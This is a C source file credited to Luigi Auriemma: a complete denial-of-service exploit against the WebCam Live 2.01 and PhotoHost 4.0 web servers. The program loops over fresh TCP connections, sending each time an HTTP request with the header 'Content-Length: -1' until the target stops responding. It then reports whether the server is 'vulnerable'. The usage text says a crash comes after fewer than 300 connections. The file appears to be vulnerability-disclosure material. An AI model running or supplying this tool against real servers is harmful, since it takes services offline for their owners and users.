/*

by Luigi Auriemma

UNIX & WIN VERSION
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define usleep  sleep
    #define TIMEZ   150     // we want to be quiet...
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>

    #define TIMEZ   150000  // ...for perfect crash
#endif





#define VER     "0.1"
#define PORT    8080
#define REQDOS  "GET / HTTP/1.0\r\n" \
                "Content-Length: -1\r\n" \
                "\r\n"




u_long resolv(char *host);
void std_err(void);





int main(int argc, char *argv[]) {
    struct  sockaddr_in     peer;
    int     sd,
            err,
            i;
    u_short port = PORT;


    setbuf(stdout, NULL);

    fputs("\n"
        "WebCam Live 2.01 and PhotoHost 4.0 negative Content-Length DoS "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\nUsage: %s <server> [port(%d)]\n"
            "\n"
            "Note: the server should crash after less than 300 connections\n"
            "Note: the default port of Photohost is 3030 while for WebCam Live is 8080\n"
            "\n", argv[0], PORT);
        exit(1);
    }

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    fputs("\nNumber of \"Content-Length: -1\" sent to the server:\n", stdout);
    i = 0;
    while(1) {
        printf("%8d\r", i);

        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();

        err = connect(sd, (struct sockaddr *)&peer, sizeof(peer));
        if(err < 0) {
            if(!i) std_err();
            close(sd);
            break;
        }

        err = send(sd, REQDOS, sizeof(REQDOS) - 1, 0);
        if(err < 0) std_err();

        close(sd);
        usleep(TIMEZ);
        i++;
    }

    fputs("\n\n- Now I check if the server is really dead\n", stdout);
    usleep(TIMEZ);
    usleep(TIMEZ);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();

    err = connect(sd, (struct sockaddr *)&peer, sizeof(peer));
    if(err < 0) {
        fputs("\n    Server IS vulnerable!!!\n\n", stdout);
    } else {
        fputs("\n    Server doesn't seem to be vulnerable (retry or use a bigger TIMEZ value in the source code)\n\n", stdout);
    }
    close(sd);

    return(0);
}





u_long resolv(char *host) {
    struct  hostent *hp;
    u_long  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)(hp->h_addr);
    }
    return(host_ip);
}




#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


